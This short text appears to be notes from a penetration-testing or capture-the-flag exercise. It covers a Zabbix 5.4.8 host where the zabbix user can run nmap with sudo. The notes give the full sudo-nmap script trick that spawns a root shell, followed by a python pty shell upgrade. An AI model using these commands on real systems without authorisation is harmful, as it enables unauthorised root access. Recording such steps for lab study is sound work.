Zabbix version 5.4.8.
The user zabbix can run nmap as sudo. Privesc:
Last updated 11 months ago
TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF
python3 -c 'import pty; pty.spawn("/bin/bash")'